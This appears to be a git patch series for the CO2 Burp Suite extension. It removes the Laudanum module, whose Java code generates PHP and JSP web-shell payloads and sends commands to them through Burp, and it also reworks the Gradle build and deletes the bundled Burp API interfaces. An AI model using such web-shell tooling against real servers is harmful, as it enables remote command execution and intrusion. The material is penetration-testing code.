txtConsole.setRows(20); - scrollPane1.setViewportView(txtConsole); - final JPanel panel5 = new JPanel(); - panel5.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(1, 3, new Insets(0, 0, 0, 0), -1, -1)); - panel3.add(panel5, new com.intellij.uiDesigner.core.GridConstraints(2, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - btnConnect = new JButton(); - btnConnect.setText("re/Connect"); - panel5.add(btnConnect, new com.intellij.uiDesigner.core.GridConstraints(0, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final com.intellij.uiDesigner.core.Spacer spacer4 = new com.intellij.uiDesigner.core.Spacer(); - panel5.add(spacer4, new com.intellij.uiDesigner.core.GridConstraints(0, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, 1, null, null, null, 0, false)); - final com.intellij.uiDesigner.core.Spacer spacer5 = new com.intellij.uiDesigner.core.Spacer(); - panel5.add(spacer5, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, 1, null, null, null, 0, false)); - final JPanel panel6 = new JPanel(); - panel6.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(1, 2, new Insets(0, 0, 0, 0), -1, -1)); - panel3.add(panel6, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - chkUseRequestTemplate = new JCheckBox(); - chkUseRequestTemplate.setEnabled(false); - chkUseRequestTemplate.setText("Use Request Template:"); - chkUseRequestTemplate.setToolTipText("Only enabled after a request has been sent to Laudanum."); - panel6.add(chkUseRequestTemplate, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - lblRequestTemplate = new JLabel(); - lblRequestTemplate.setText("[Hint: Send a request to Laudanum]"); - panel6.add(lblRequestTemplate, new com.intellij.uiDesigner.core.GridConstraints(0, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - } - - /** - * @noinspection ALL - */ - public JComponent $$$getRootComponent$$$() { - return mainPanel; - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumCo2Extender.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumCo2Extender.java deleted file mode 100644 index 39b1818..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumCo2Extender.java +++ /dev/null @@ -1,73 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.professionallyevil.co2.laudanum; - -import burp.IBurpExtenderCallbacks; -import burp.IExtensionStateListener; -import com.professionallyevil.co2.Co2Configurable; -import com.professionallyevil.co2.Co2Extender; - -import javax.swing.*; -import java.awt.*; - -public class LaudanumCo2Extender implements IExtensionStateListener, Co2Extender { - public static final String VERSION = "0.8.3 b"; - private IBurpExtenderCallbacks callbacks; - - public LaudanumCo2Extender() { - } - - public IBurpExtenderCallbacks getCallbacks() { - return callbacks; - } - - @Override - public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { - this.callbacks = callbacks; - callbacks.setExtensionName("Burp Laudanum"); - - LaudanumClient laudanum = new LaudanumClient(this); - - - callbacks.customizeUiComponent(laudanum.getTabComponent()); - callbacks.addSuiteTab(laudanum); - callbacks.registerContextMenuFactory(laudanum); - - callbacks.printOutput("Burp Laudanum Loaded. Version: " + VERSION); - - } - - @Override - public void extensionUnloaded() { - } - - /** - * Callback to select the specified configurable item's tab. - * - * @param configurable The configurable item for which a tab should be selected. - * @param selectCo2Tab ignored in this implementation. - */ - public void selectConfigurableTab(Co2Configurable configurable, boolean selectCo2Tab) { - Component tabComponent = configurable.getTabComponent(); - if (tabComponent != null) { - Container parent = tabComponent.getParent(); - if (parent instanceof JTabbedPane) { - ((JTabbedPane) parent).setSelectedComponent(tabComponent); - } - } - } -} \ No newline at end of file diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumRequest.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumRequest.java deleted file mode 100644 index 8f651ce..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumRequest.java +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.professionallyevil.co2.laudanum; - -import burp.IBurpExtenderCallbacks; -import burp.IParameter; - -import java.net.URL; - -public class LaudanumRequest { - private byte defaultParamType; - private IBurpExtenderCallbacks callbacks; - private byte[] requestBytes; - - - public LaudanumRequest(IBurpExtenderCallbacks callbacks, URL url, String method) { - this.callbacks = callbacks; - - if (method.equalsIgnoreCase("POST")) { - defaultParamType = IParameter.PARAM_BODY; - } else { - defaultParamType = IParameter.PARAM_URL; - } - - requestBytes = callbacks.getHelpers().buildHttpRequest(url); - } - - public LaudanumRequest(IBurpExtenderCallbacks callbacks, String method, byte[] requestTemplate) { - this.callbacks = callbacks; - this.requestBytes = requestTemplate; - - if (method.equalsIgnoreCase("POST")) { - defaultParamType = IParameter.PARAM_BODY; - - } else { - defaultParamType = IParameter.PARAM_URL; - } - } - - private void addParameter(String name, String value, byte type) { - IParameter param = callbacks.getHelpers().buildParameter(name, value, type); - requestBytes = callbacks.getHelpers().addParameter(requestBytes, param); - } - -// public void addPostParameter(String name, String value){ -// addParameter(name, value, IParameter.PARAM_BODY); -// } - - public void setToken(String token) { - addParameter("laudtoken", token, defaultParamType); - } - - public void setCommand(String command) { - addParameter("laudcmd", callbacks.getHelpers().urlEncode(command), defaultParamType); - } - - public void setWorkingDirectory(String cwd) { - addParameter("laudcwd", callbacks.getHelpers().urlEncode(cwd), defaultParamType); - } - - public byte[] getRequestBytes() { - return requestBytes; - } - - -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumResponse.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumResponse.java deleted file mode 100644 index 86fcde9..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumResponse.java +++ /dev/null @@ -1,64 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.professionallyevil.co2.laudanum; - -import burp.IBurpExtenderCallbacks; -import burp.IResponseInfo; - -import java.util.Arrays; -import java.util.HashMap; -import java.util.Map; - -public class LaudanumResponse { - - private Map params = new HashMap(); - - public LaudanumResponse(IBurpExtenderCallbacks callbacks, byte[] responseBytes) { - IResponseInfo responseInfo = callbacks.getHelpers().analyzeResponse(responseBytes); - byte[] body = Arrays.copyOfRange(responseBytes, responseInfo.getBodyOffset(), responseBytes.length); - - String[] outputParts = callbacks.getHelpers().bytesToString(body).split("&"); - - for (String part : outputParts) { - String[] split = part.split("="); - if (split.length == 2) { - params.put(split[0].trim(), callbacks.getHelpers().urlDecode(split[1])); - //callbacks.printOutput("Setting: " + part); - //callbacks.printOutput("*** NAME = '" + split[0] + "'"); - //callbacks.printOutput("*** VALUE = "+split[1]); - //callbacks.printOutput("*** DECODED VALUE = "+callbacks.getHelpers().urlDecode(split[1])); - } - } - - if (params.size() < 2) { - params.put("stderr", callbacks.getHelpers().urlDecode(callbacks.getHelpers().bytesToString(body))); // if we can't process the response, spit out what we got. - } - } - - public String getStderr() { - return params.containsKey("stderr") ? params.get("stderr") : ""; - } - - public String getStdout() { - return params.containsKey("stdout") ? params.get("stdout") : ""; - } - - public String getCwd() { - return params.containsKey("cwd") ? params.get("cwd").trim() : ""; - } - -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PHPShellPayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PHPShellPayloadType.java deleted file mode 100644 index 3d496a6..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PHPShellPayloadType.java +++ /dev/null @@ -1,25 +0,0 @@ -package com.professionallyevil.co2.laudanum; - -import java.awt.*; -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; - -public class PHPShellPayloadType extends PayloadType { - - @Override - public void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws IOException { - File file = chooseFile(parentComponent, "shell.php", "Choose php filename"); - if(file != null){ - FileOutputStream fos = new FileOutputStream(file); - processTemplate(fos, renderList(acceptIPs.split(","), ",", "\""),acceptToken); - - } - } - - @Override - public String getTemplate(){ - return "com/professionallyevil/co2/laudanum/php/shell.php"; - } - -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PayloadType.java deleted file mode 100644 index 1322294..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PayloadType.java +++ /dev/null @@ -1,55 +0,0 @@ -package com.professionallyevil.co2.laudanum; - -import javax.swing.*; -import java.awt.*; -import java.io.*; - -public abstract class PayloadType { - - public abstract void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws Exception; - - - String renderList(String[] acceptIps, String delimiter, String enclosingChar) { - StringBuilder ipslist = new StringBuilder(); - for (String ip : acceptIps) { - ipslist.append(enclosingChar); - ipslist.append(ip); - ipslist.append(enclosingChar); - ipslist.append(delimiter); - } - ipslist.deleteCharAt(ipslist.length() - delimiter.length()); - return ipslist.toString(); - } - - void processTemplate(OutputStream output, String acceptIPs, String acceptToken) throws IOException { - InputStream inStream = this.getClass().getClassLoader().getResourceAsStream(getTemplate()); - BufferedReader reader = new BufferedReader(new InputStreamReader(inStream)); - - String line = reader.readLine(); - while (line != null) { - line = line.replace("${LAUD.IPS}", acceptIPs); - line = line.replace("${LAUD.TOKEN}", acceptToken); - output.write(line.getBytes()); - output.write("\n".getBytes()); - line = reader.readLine(); - } - - output.flush(); - output.close(); - inStream.close(); - } - - abstract String getTemplate(); - - File chooseFile(Component parentComponent, String defaultName, String title) { - final JFileChooser fc = new JFileChooser(); - fc.setDialogTitle(title); - fc.setSelectedFile(new File(defaultName)); - int returnVal = fc.showSaveDialog(parentComponent); - if (returnVal == JFileChooser.APPROVE_OPTION) { - return fc.getSelectedFile(); - } else { - return null; - } - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/WARShellPayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/WARShellPayloadType.java deleted file mode 100644 index 7553bbc..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/WARShellPayloadType.java +++ /dev/null @@ -1,59 +0,0 @@ -package com.professionallyevil.co2.laudanum; - -import javax.swing.*; -import java.awt.*; -import java.io.ByteArrayInputStream; -import java.io.ByteArrayOutputStream; -import java.io.File; -import java.io.FileOutputStream; -import java.util.jar.JarEntry; -import java.util.jar.JarOutputStream; - - -public class WARShellPayloadType extends PayloadType { - @Override - public void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws Exception { - String filename = JOptionPane.showInputDialog(parentComponent, "What do you want to call the jsp file?", "shell.jsp"); - - if (filename != null) { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - processTemplate(bos, renderList(acceptIPs.split(","), ",", "\""), acceptToken); - File warfile = chooseFile(parentComponent, "laudanum.war", "Choose war filename"); - if (warfile != null) { - FileOutputStream fos = new FileOutputStream(warfile); - JarOutputStream jos = new JarOutputStream(fos); - jos.putNextEntry(new JarEntry("/WEB-INF/web.xml")); - jos.write("\n".getBytes()); - jos.write(("\n").getBytes()); - jos.write(" \n".getBytes()); - jos.write(" Command\n".getBytes()); - jos.write((" /" + filename + "\n").getBytes()); - jos.write(" \n".getBytes()); - jos.closeEntry(); - jos.putNextEntry(new JarEntry(filename)); - - ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray()); - - byte[] buffer = new byte[128]; - int length; - while ((length = bis.read(buffer)) > 0) { - jos.write(buffer, 0, length); - } - jos.closeEntry(); - jos.flush(); - jos.close(); - fos.flush(); - fos.close(); - } - } - } - - @Override - String getTemplate() { - return "com/professionallyevil/co2/laudanum/java/shell.jsp"; - } -} diff --git a/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java b/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java index f13697f..e27c772 100644 --- a/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java +++ b/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java @@ -21,7 +21,6 @@ import burp.IExtensionStateListener; import com.professionallyevil.co2.basicauth.BasicAuther; import com.professionallyevil.co2.cewler.CewlerTab; -import com.professionallyevil.co2.laudanum.LaudanumClient; import com.professionallyevil.co2.masher.MasherConfig; import com.professionallyevil.co2.namemangler.NameManglerTab; import com.professionallyevil.co2.sqlmapper.SQLMapper; @@ -72,9 +71,6 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { MiscTab miscTab = new MiscTab(callbacks); - LaudanumClient laudanum = new LaudanumClient(this); - callbacks.registerContextMenuFactory(laudanum); - final About about = new About(callbacks); co2Timer.schedule(new java.util.TimerTask() { @Override @@ -83,7 +79,7 @@ public void run() { } }, 1000 * 10, 1000 * 60 * 60 * 24); // check 10 seconds after startup + every 24 hr - Co2Configurable[] configurables = {mapper, laudanum, userGenerator, nameMangler, cewler, masher, basicauther, + Co2Configurable[] configurables = {mapper, userGenerator, nameMangler, cewler, masher, basicauther, miscTab, about}; configTab = new Co2ConfigTab(callbacks, configurables); diff --git a/settings.gradle b/settings.gradle index 62ebd66..9d8873d 100644 --- a/settings.gradle +++ b/settings.gradle @@ -1,4 +1,4 @@ -['core', 'laudanum', 'sqlmapper', 'cewler', 'suite'].each { +['core', 'sqlmapper', 'cewler', 'suite'].each { def prj = "co2-${it}" include prj project(":${prj}").projectDir = new File(settingsDir, "modules/${prj}") From 70a1c066bea37609c72bbe3b3097225d3d47ab51 Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 13:59:20 -0500 Subject: [PATCH 2/8] update gradle build --- .gitignore | 2 +- build.gradle | 73 +- .../co2/Co2SuiteExtender.java | 2 +- src/burp/BurpExtender.java | 13 - src/burp/IBurpExtender.java | 31 - src/burp/IBurpExtenderCallbacks.java | 1033 ----------------- src/burp/IContextMenuFactory.java | 38 - src/burp/IContextMenuInvocation.java | 156 --- src/burp/ICookie.java | 53 - src/burp/IExtensionHelpers.java | 352 ------ src/burp/IExtensionStateListener.java | 27 - src/burp/IHttpListener.java | 37 - src/burp/IHttpRequestResponse.java | 102 -- src/burp/IHttpRequestResponsePersisted.java | 26 - src/burp/IHttpRequestResponseWithMarkers.java | 44 - src/burp/IHttpService.java | 39 - src/burp/IInterceptedProxyMessage.java | 116 -- src/burp/IIntruderAttack.java | 31 - src/burp/IIntruderPayloadGenerator.java | 50 - .../IIntruderPayloadGeneratorFactory.java | 40 - src/burp/IIntruderPayloadProcessor.java | 45 - src/burp/IMenuItemHandler.java | 36 - src/burp/IMessageEditor.java | 64 - src/burp/IMessageEditorController.java | 49 - src/burp/IMessageEditorTab.java | 102 -- src/burp/IMessageEditorTabFactory.java | 38 - src/burp/IParameter.java | 104 -- src/burp/IProxyListener.java | 37 - src/burp/IRequestInfo.java | 95 -- src/burp/IResponseInfo.java | 73 -- src/burp/IScanIssue.java | 120 -- src/burp/IScanQueueItem.java | 80 -- src/burp/IScannerCheck.java | 83 -- src/burp/IScannerInsertionPoint.java | 159 --- src/burp/IScannerInsertionPointProvider.java | 38 - src/burp/IScannerListener.java | 30 - src/burp/IScopeChangeListener.java | 25 - src/burp/ISessionHandlingAction.java | 51 - src/burp/ITab.java | 38 - src/burp/ITempFile.java | 33 - src/burp/ITextEditor.java | 90 -- 41 files changed, 42 insertions(+), 3613 deletions(-) delete mode 100644 src/burp/BurpExtender.java delete mode 100644 src/burp/IBurpExtender.java delete mode 100644 src/burp/IBurpExtenderCallbacks.java delete mode 100644 src/burp/IContextMenuFactory.java delete mode 100644 src/burp/IContextMenuInvocation.java delete mode 100644 src/burp/ICookie.java delete mode 100644 src/burp/IExtensionHelpers.java delete mode 100644 src/burp/IExtensionStateListener.java delete mode 100644 src/burp/IHttpListener.java delete mode 100644 src/burp/IHttpRequestResponse.java delete mode 100644 src/burp/IHttpRequestResponsePersisted.java delete mode 100644 src/burp/IHttpRequestResponseWithMarkers.java delete mode 100644 src/burp/IHttpService.java delete mode 100644 src/burp/IInterceptedProxyMessage.java delete mode 100644 src/burp/IIntruderAttack.java delete mode 100644 src/burp/IIntruderPayloadGenerator.java delete mode 100644 src/burp/IIntruderPayloadGeneratorFactory.java delete mode 100644 src/burp/IIntruderPayloadProcessor.java delete mode 100644 src/burp/IMenuItemHandler.java delete mode 100644 src/burp/IMessageEditor.java delete mode 100644 src/burp/IMessageEditorController.java delete mode 100644 src/burp/IMessageEditorTab.java delete mode 100644 src/burp/IMessageEditorTabFactory.java delete mode 100644 src/burp/IParameter.java delete mode 100644 src/burp/IProxyListener.java delete mode 100644 src/burp/IRequestInfo.java delete mode 100644 src/burp/IResponseInfo.java delete mode 100644 src/burp/IScanIssue.java delete mode 100644 src/burp/IScanQueueItem.java delete mode 100644 src/burp/IScannerCheck.java delete mode 100644 src/burp/IScannerInsertionPoint.java delete mode 100644 src/burp/IScannerInsertionPointProvider.java delete mode 100644 src/burp/IScannerListener.java delete mode 100644 src/burp/IScopeChangeListener.java delete mode 100644 src/burp/ISessionHandlingAction.java delete mode 100644 src/burp/ITab.java delete mode 100644 src/burp/ITempFile.java delete mode 100644 src/burp/ITextEditor.java diff --git a/.gitignore b/.gitignore index 374f7b9..3c4379b 100644 --- a/.gitignore +++ b/.gitignore @@ -2,5 +2,5 @@ build/ modules/burp-api/burp/ .idea/ - +dist/ diff --git a/build.gradle b/build.gradle index dad75aa..ccce0cb 100644 --- a/build.gradle +++ b/build.gradle @@ -12,10 +12,7 @@ allprojects { } } -dependencies { - implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - implementation project(':co2-suite') -} +// ... (other configurations) project(':co2-core') { dependencies { @@ -23,46 +20,56 @@ project(':co2-core') { } } -project(':co2-sqlmapper') { - dependencies { - implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - implementation 'com.intellij:forms_rt:7.0.3' - implementation project(':co2-core') + +subprojects { + // Apply common configuration to all subprojects except 'co2-core' + if (name != 'co2-core') { + dependencies { + implementation project(':co2-core') + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' + implementation 'javax.xml.bind:jaxb-api:2.3.1' + implementation 'com.sun.xml.bind:jaxb-core:2.3.0.1' + implementation 'com.sun.xml.bind:jaxb-impl:2.3.2' + implementation 'com.intellij:forms_rt:7.0.3' + } } - task fatJar(type: Jar) { - archiveBaseName = project.name + '-all' - from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } } + // Define fatJar for all subprojects that require it + tasks.register('fatJar', Jar) { + archiveBaseName = "${project.name}-all" + from sourceSets.main.output + from { configurations.runtimeClasspath.collect { it.isDirectory() ? it : zipTree(it) } } with jar - } -} -project(':co2-cewler') { - dependencies { - implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - implementation 'com.intellij:forms_rt:7.0.3' - implementation project(':co2-core') - } + // Set duplicate strategy + duplicatesStrategy = DuplicatesStrategy.EXCLUDE - task fatJar(type: Jar) { - archiveBaseName = project.name + '-all' - from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } } - with jar + doLast { + if (project.name != 'co2-core') { + // Get the fat jar file + def distDir = file("$rootProject.projectDir/dist") + if (!distDir.exists()) { + distDir.mkdirs() + } + + // Copy the fat jar to the /dist directory + copy { + from archiveFile + into distDir + rename { String fileName -> + "${project.name}.jar" + } + } + } + } } } +// Configure specific dependencies for 'co2-suite' project(':co2-suite') { dependencies { - implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - implementation project(':co2-core') + // 'co2-core' is already included above in the 'subprojects' block implementation project(':co2-sqlmapper') implementation project(':co2-cewler') - implementation project(':co2-core') } } - -task fatJar(type: Jar) { - archiveBaseName = project.name + '-all' - from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } } - with jar -} diff --git a/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java b/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java index e27c772..ff3c7d6 100644 --- a/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java +++ b/modules/co2-suite/src/com/professionallyevil/co2/Co2SuiteExtender.java @@ -34,7 +34,7 @@ * burp.BurpExtender */ public class Co2SuiteExtender implements IBurpExtender, IExtensionStateListener, Co2Extender { - public static final String VERSION = "1.1.13"; + public static final String VERSION = "1.2.0"; private Co2ConfigTab configTab; private IBurpExtenderCallbacks callbacks; private java.util.Timer co2Timer = new java.util.Timer("CO2", false); diff --git a/src/burp/BurpExtender.java b/src/burp/BurpExtender.java deleted file mode 100644 index fed9d19..0000000 --- a/src/burp/BurpExtender.java +++ /dev/null @@ -1,13 +0,0 @@ -package burp; - -import com.professionallyevil.co2.*; - -public class BurpExtender implements IBurpExtender { - private final Co2Extender co2Extender = new Co2SuiteExtender(); - - @Override - public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { - - co2Extender.registerExtenderCallbacks(callbacks); - } -} diff --git a/src/burp/IBurpExtender.java b/src/burp/IBurpExtender.java deleted file mode 100644 index ff6ad12..0000000 --- a/src/burp/IBurpExtender.java +++ /dev/null @@ -1,31 +0,0 @@ -package burp; - -/* - * @(#)IBurpExtender.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * All extensions must implement this interface. - * - * Implementations must be called BurpExtender, in the package burp, must be - * declared public, and must provide a default (public, no-argument) - * constructor. - */ -public interface IBurpExtender -{ - /** - * This method is invoked when the extension is loaded. It registers an - * instance of the - * IBurpExtenderCallbacks interface, providing methods that may - * be invoked by the extension to perform various actions. - * - * @param callbacks An - * IBurpExtenderCallbacks object. - */ - void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks); -} diff --git a/src/burp/IBurpExtenderCallbacks.java b/src/burp/IBurpExtenderCallbacks.java deleted file mode 100644 index 110803a..0000000 --- a/src/burp/IBurpExtenderCallbacks.java +++ /dev/null @@ -1,1033 +0,0 @@ -package burp; - -/* - * @(#)IBurpExtenderCallbacks.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.Component; -import java.io.OutputStream; -import java.util.List; -import java.util.Map; - -/** - * This interface is used by Burp Suite to pass to extensions a set of callback - * methods that can be used by extensions to perform various actions within - * Burp. - * - * When an extension is loaded, Burp invokes its - * registerExtenderCallbacks() method and passes an instance of the - * IBurpExtenderCallbacks interface. The extension may then invoke - * the methods of this interface as required in order to extend Burp's - * functionality. - */ -public interface IBurpExtenderCallbacks -{ - /** - * Flag used to identify Burp Suite as a whole. - */ - static final int TOOL_SUITE = 0x00000001; - /** - * Flag used to identify the Burp Target tool. - */ - static final int TOOL_TARGET = 0x00000002; - /** - * Flag used to identify the Burp Proxy tool. - */ - static final int TOOL_PROXY = 0x00000004; - /** - * Flag used to identify the Burp Spider tool. - */ - static final int TOOL_SPIDER = 0x00000008; - /** - * Flag used to identify the Burp Scanner tool. - */ - static final int TOOL_SCANNER = 0x00000010; - /** - * Flag used to identify the Burp Intruder tool. - */ - static final int TOOL_INTRUDER = 0x00000020; - /** - * Flag used to identify the Burp Repeater tool. - */ - static final int TOOL_REPEATER = 0x00000040; - /** - * Flag used to identify the Burp Sequencer tool. - */ - static final int TOOL_SEQUENCER = 0x00000080; - /** - * Flag used to identify the Burp Decoder tool. - */ - static final int TOOL_DECODER = 0x00000100; - /** - * Flag used to identify the Burp Comparer tool. - */ - static final int TOOL_COMPARER = 0x00000200; - /** - * Flag used to identify the Burp Extender tool. - */ - static final int TOOL_EXTENDER = 0x00000400; - - /** - * This method is used to set the display name for the current extension, - * which will be displayed within the user interface for the Extender tool. - * - * @param name The extension name. - */ - void setExtensionName(String name); - - /** - * This method is used to obtain an - * IExtensionHelpers object, which can be used by the extension - * to perform numerous useful tasks. - * - * @return An object containing numerous helper methods, for tasks such as - * building and analyzing HTTP requests. - */ - IExtensionHelpers getHelpers(); - - /** - * This method is used to obtain the current extension's standard output - * stream. Extensions should write all output to this stream, allowing the - * Burp user to configure how that output is handled from within the UI. - * - * @return The extension's standard output stream. - */ - OutputStream getStdout(); - - /** - * This method is used to obtain the current extension's standard error - * stream. Extensions should write all error messages to this stream, - * allowing the Burp user to configure how that output is handled from - * within the UI. - * - * @return The extension's standard error stream. - */ - OutputStream getStderr(); - - /** - * This method prints a line of output to the current extension's standard - * output stream. - * - * @param output The message to print. - */ - void printOutput(String output); - - /** - * This method prints a line of output to the current extension's standard - * error stream. - * - * @param error The message to print. - */ - void printError(String error); - - /** - * This method is used to register a listener which will be notified of - * changes to the extension's state. Note: Any extensions that start - * background threads or open system resources (such as files or database - * connections) should register a listener and terminate threads / close - * resources when the extension is unloaded. - * - * @param listener An object created by the extension that implements the - * IExtensionStateListener interface. - */ - void registerExtensionStateListener(IExtensionStateListener listener); - - /** - * This method is used to retrieve the extension state listeners that are - * registered by the extension. - * - * @return A list of extension state listeners that are currently registered - * by this extension. - */ - List getExtensionStateListeners(); - - /** - * This method is used to remove an extension state listener that has been - * registered by the extension. - * - * @param listener The extension state listener to be removed. - */ - void removeExtensionStateListener(IExtensionStateListener listener); - - /** - * This method is used to register a listener which will be notified of - * requests and responses made by any Burp tool. Extensions can perform - * custom analysis or modification of these messages by registering an HTTP - * listener. - * - * @param listener An object created by the extension that implements the - * IHttpListener interface. - */ - void registerHttpListener(IHttpListener listener); - - /** - * This method is used to retrieve the HTTP listeners that are registered by - * the extension. - * - * @return A list of HTTP listeners that are currently registered by this - * extension. - */ - List getHttpListeners(); - - /** - * This method is used to remove an HTTP listener that has been registered - * by the extension. - * - * @param listener The HTTP listener to be removed. - */ - void removeHttpListener(IHttpListener listener); - - /** - * This method is used to register a listener which will be notified of - * requests and responses being processed by the Proxy tool. Extensions can - * perform custom analysis or modification of these messages, and control - * in-UI message interception, by registering a proxy listener. - * - * @param listener An object created by the extension that implements the - * IProxyListener interface. - */ - void registerProxyListener(IProxyListener listener); - - /** - * This method is used to retrieve the Proxy listeners that are registered - * by the extension. 